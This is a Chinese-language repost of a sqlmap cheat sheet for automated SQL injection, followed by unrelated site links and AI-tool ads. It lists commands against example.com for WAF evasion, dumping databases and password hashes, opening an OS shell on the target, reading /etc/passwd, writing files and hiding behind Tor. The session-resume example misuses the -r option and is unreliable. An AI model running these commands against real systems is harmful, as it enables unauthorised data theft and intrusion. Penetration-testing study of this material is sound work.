SQLMap 备忘单：自动 SQL 注入快速指南

聖光之護

发布时间：2024-09-26 14:33:01

547人浏览过

来源于dev.to

转载

sqlmap 备忘单：自动 sql 注入快速指南

作者：特里克斯·赛勒斯

什么是 sqlmap？
sqlmap是一个开源渗透测试工具，用于检测和利用web应用程序中的sql注入漏洞。它支持各种数据库系统，如 mysql、postgresql、oracle、microsoft sql server 等。

基本用法
要开始使用 sqlmap，您可以通过提供目标 url 以最简单的形式运行它：

sqlmap -u "http://example.com/index.php?id=1"

此命令扫描目标 url 是否存在 sql 注入漏洞。

1。检测漏洞
使用以下选项执行基本的漏洞扫描并自动检测 sql 注入点：

sqlmap -u "http://example.com/index.php?id=1" --dbs

--dbs：如果发现漏洞，列出目标服务器上所有可用的数据库。

2。指定 post 请求

对于需要 post 请求的目标（通常在登录表单中），您可以指定如下数据：

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"

3。绕过 waf 和过滤器

为了逃避 web 应用程序防火墙 (waf)，sqlmap 包含有效负载混淆技术：

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

--tamper：使用篡改脚本来逃避过滤器。示例：space2comment、charencode。

4。提取数据库、表和列
要获取目标系统上的数据库列表：

sqlmap -u "http://example.com/index.php?id=1" --dbs

识别数据库后，提取其表：

sqlmap -u "http://example.com/index.php?id=1" -d database_name --tables

要从特定表中获取列：

sqlmap -u "http://example.com/index.php?id=1" -d database_name -t table_name --columns

5。转储数据

转储表的内容是 sqlmap 最有用的功能之一。例如，转储特定表中的所有数据：

sqlmap -u "http://example.com/index.php?id=1" -d database_name -t table_name --dump

6。枚举数据库用户和密码

sqlmap 还可以用于枚举数据库用户，甚至破解哈希密码：

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords

7。访问操作系统

在某些情况下，sqlmap可以用来在操作系统上执行命令，特别是当数据库用户具有高级权限时：

Artbreeder

创建令人惊叹的插画和艺术

下载

sqlmap -u "http://example.com/index.php?id=1" --os-shell

这将提供一个交互式 shell，您可以在其中在目标系统上执行命令。

8。文件上传与读取

您还可以从目标系统读取文件或上传恶意文件（如果允许）：

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"

9。使用 tor 进行匿名

要隐藏您的身份，您可以通过 tor 网络运行 sqlmap：

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=socks5 --check-tor

--tor：启用 tor。
--check-tor：验证是否通过 tor 建立连接。

10。保存和恢复会话

sqlmap 允许您使用 --session 选项保存和恢复进度：

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name

稍后，您可以通过以下方式恢复同一会话：

sqlmap -r your_session_name

11。详细模式

要查看有关 sqlmap 正在执行的操作的详细信息：

sqlmap -u "http://example.com/index.php?id=1" -v 3

-v 选项控制详细程度（级别从 0 到 6，其中 6 显示所有详细信息）。

自动扫描多个目标

sqlmap 支持扫描存储在文件中的多个 url：

sqlmap -m urls.txt --batch

--batch：使用默认选项自动回答所有提示，对于自动扫描很有用。

还可以使用 --risk=3 和 --level=5 来提前扫描
您可以使用此备忘单向读者介绍 sqlmap 的基本命令，并帮助他们开始 sql 注入测试。

~trixsec

python怎么存储数据

python mysql错误如何处理

如何在 Python 中安全查询 MySQL 表中匹配用户名和密码的记录

如何在 Python 中安全地从 MySQL 查询匹配用户名和密码的用户记录

如何在Python中安全地从MySQL查询匹配用户名和密码的用户记录

本站声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

上一篇：在 Flet 中处理 DatePicker 下一篇：hbuilder格式化json

作者最新文章

现代都市斗法罗刹？这款新作把印度神话玩出花！

2026-01-12 14:26

如何强制 Chrome 加载网页最新版本而不依赖手动清缓存

2026-01-12 14:27

如何解决笔记本触摸板“轻触点击”无法触发 onclick 事件的问题

2026-01-12 14:34

快手如何发图集作品

2026-01-12 14:43

360手机浏览器无痕模式怎么设置

2026-01-12 14:47

只差官宣了？《使命召唤》启动器代码出现任天堂标识

2026-01-12 14:53

商品怎么置顶视频号评论？评论区置顶广告位在哪？

2026-01-12 15:08

抖音私信获客适合什么行业？私信获客的收费标准是什么？

2026-01-12 15:13

商家回应一盒内存条能买上海一套房：还真差不多！

2026-01-12 15:18

新三国志曹操传沙盘1750-1949过关攻略

2026-01-12 15:23

热门AI工具

DeepSeek

幻方量化公司旗下的开源大模型平台

AI大模型

开放平台

豆包大模型

字节跳动自主研发的一系列大型语言模型

AI大模型

通义千问

阿里巴巴推出的全能AI助手

AI大模型

腾讯元宝

腾讯混元平台推出的AI助手

文档处理

Excel 表格

文心一言

文心一言是百度开发的AI聊天机器人，通过对话可以生成各种形式的内容。

AI大模型

中文写作

讯飞写作

基于讯飞星火大模型的AI写作工具，可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

中文写作

写作工具

即梦AI

一站式AI创作平台，免费AI图片和视频生成。

图片拼接

图画生成

ChatGPT

最最强大的AI聊天机器人程序，ChatGPT不单是聊天机器人，还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

AI大模型

中文写作

智谱清言 - 免费全能的AI助手

AI大模型

PDF 文档

相关专题

数据分析工具有哪些

数据分析工具有Excel、SQL、Python、R、Tableau、Power BI、SAS、SPSS和MATLAB等。详细介绍：1、Excel，具有强大的计算和数据处理功能；2、SQL，可以进行数据查询、过滤、排序、聚合等操作；3、Python，拥有丰富的数据分析库；4、R，拥有丰富的统计分析库和图形库；5、Tableau，提供了直观易用的用户界面等等。

676

2023.10.12